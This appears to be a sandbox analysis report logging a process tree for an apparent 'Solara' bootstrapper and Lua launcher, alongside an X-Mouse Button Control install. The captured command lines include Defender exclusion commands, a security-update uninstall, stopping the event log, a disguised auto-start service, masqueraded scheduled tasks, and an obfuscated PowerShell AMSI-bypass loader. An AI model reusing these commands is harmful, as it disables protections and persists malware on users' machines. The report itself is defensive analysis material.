PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 1904	5112	msedge.exe	82
PID 5112 wrote to memory of 5116	5112	msedge.exe	83
PID 5112 wrote to memory of 5116	5112	msedge.exe	83
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84
PID 5112 wrote to memory of 984	5112	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\XMouseButtonControlSetup.2.20.5.exe
"C:\Users\Admin\AppData\Local\Temp\XMouseButtonControlSetup.2.20.5.exe"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
PID:868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.highrez.co.uk/scripts/postinstall.asp?package=XMouse&major=2&minor=20&build=5&revision=0&platform=x64
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffdf973cb8,0x7fffdf973cc8,0x7fffdf973cd8
  2⤵
  PID:3936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
  2⤵
  PID:1904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2424 /prefetch:8
  2⤵
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
  2⤵
  PID:4080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4836 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4664
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:2820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
  2⤵
  PID:4784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5240 /prefetch:1
  2⤵
  PID:3692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
  2⤵
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1
  2⤵
  PID:3780
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5472 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:1848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
  2⤵
  PID:3464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
  2⤵
  PID:3708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4564 /prefetch:8
  2⤵
  PID:3684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  2⤵
  PID:2760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5684 /prefetch:1
  2⤵
  PID:2540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7064 /prefetch:1
  2⤵
  PID:2008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7076 /prefetch:8
  2⤵
  PID:4924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2768
- C:\Users\Admin\Downloads\SolaraBootstrapper.exe
  "C:\Users\Admin\Downloads\SolaraBootstrapper.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2512
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:664
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:8
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "FJYXXCRO"
    3⤵
    - Launches sc.exe
    PID:244
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "FJYXXCRO" binpath= "C:\ProgramData\hqhljhibbsdc\cxxvyevuiied.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:3464
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2064
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "FJYXXCRO"
    3⤵
    - Launches sc.exe
    PID:1464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17120798126541526830,16470586463027009049,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1020 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2052

C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
"C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe" /Installed /notportable
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3592

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2000

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4820

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:416

C:\Users\Admin\Downloads\Solara\lua.exe
"C:\Users\Admin\Downloads\Solara\lua.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1780

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Launcher.bat" "
1⤵
PID:2512
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe config.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - NTFS ADS
  PID:1660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc daily /st 11:21 /f /tn WindowsErrorReporting_ODA3 /tr ""C:\Users\Admin\AppData\Local\ODA3\ODA3.exe" "C:\Users\Admin\AppData\Local\ODA3\config.txt""
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4684
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc daily /st 11:21 /f /tn Setup /tr "C:/Windows/System32/oobe/Setup.exe" /rl highest
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Solara\Launcher.bat" "
1⤵
PID:4996
- C:\Users\Admin\Downloads\Solara\lua.exe
  lua.exe config.txt
  2⤵
  PID:3624

C:\Users\Admin\Downloads\Solara\lua.exe
"C:\Users\Admin\Downloads\Solara\lua.exe"
1⤵
PID:808

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004E0
1⤵
PID:2812

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wfiLIAUHGafT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bsKEeClvzQJsPI,[Parameter(Position=1)][Type]$ElxiVKOzUN)$oZqtUgSsbTC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'ef'+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+'e'+'g'+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+'or'+'y'+'Mo'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'Ty'+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+'e'+'a'+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+'s'+'i'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+'u'+[Char](116)+''+[Char](111)+''+'C'+''+'l'+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$oZqtUgSsbTC.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+'N'+[Char](97)+''+'m'+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+'bli'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$bsKEeClvzQJsPI).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');$oZqtUgSsbTC.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](72)+'i'+'d'+'e'+'B'+''+[Char](121)+'Si'+'g'+''+','+'Ne'+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+'V'+[Char](105)+''+'r'+''+'t'+''+[Char](117)+'a'+'l'+'',$ElxiVKOzUN,$bsKEeClvzQJsPI).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $oZqtUgSsbTC.CreateType();}$DIvwlDYrkTixp=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+'t'+'e'+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+'o'+''+[Char](115)+'o'+[Char](102)+'t'+[Char](46)+''+[Char](87)+'in'+'3'+''+'2'+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+''+[Char](102)+''+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+'s');$LyyQYHYTOBHBXx=$DIvwlDYrkTixp.GetMethod('G'+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',S'+[Char](116)+''+'a'+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TYMroBrzZcgfmzBUJRV=wfiLIAUHGafT @([String])([IntPtr]);$zucDkAGWmwlYLRrnLWMYxl=wfiLIAUHGafT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FPHPNlfornW=$DIvwlDYrkTixp.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+'du'+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$tgTYhDsKjeExRO=$LyyQYHYTOBHBXx.Invoke($Null,@([Object]$FPHPNlfornW,[Object](''+[Char](76)+''+'o'+'ad'+[Char](76)+''+'i'+'b'+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+'A')));$OhDZGjjgeEfQpnaHa=$LyyQYHYTOBHBXx.Invoke($Null,@([Object]$FPHPNlfornW,[Object](''+'V'+''+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$XMQtkLT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tgTYhDsKjeExRO,$TYMroBrzZcgfmzBUJRV).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+[Char](108)+'l');$pxlBQjcDELJomolgf=$LyyQYHYTOBHBXx.Invoke($Null,@([Object]$XMQtkLT,[Object](''+'A'+'m'+'s'+'i'+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+[Char](114)+'')));$LElEwXqAjc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OhDZGjjgeEfQpnaHa,$zucDkAGWmwlYLRrnLWMYxl).Invoke($pxlBQjcDELJomolgf,[uint32]8,4,[ref]$LElEwXqAjc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$pxlBQjcDELJomolgf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OhDZGjjgeEfQpnaHa,$zucDkAGWmwlYLRrnLWMYxl).Invoke($pxlBQjcDELJomolgf,[uint32]8,0x20,[ref]$LElEwXqAjc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+'T'+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+'a'+'l'+'e'+[Char](114)+''+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Command and Scripting Interpreter: PowerShell
PID:2444

C:\ProgramData\hqhljhibbsdc\cxxvyevuiied.exe
C:\ProgramData\hqhljhibbsdc\cxxvyevuiied.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4472
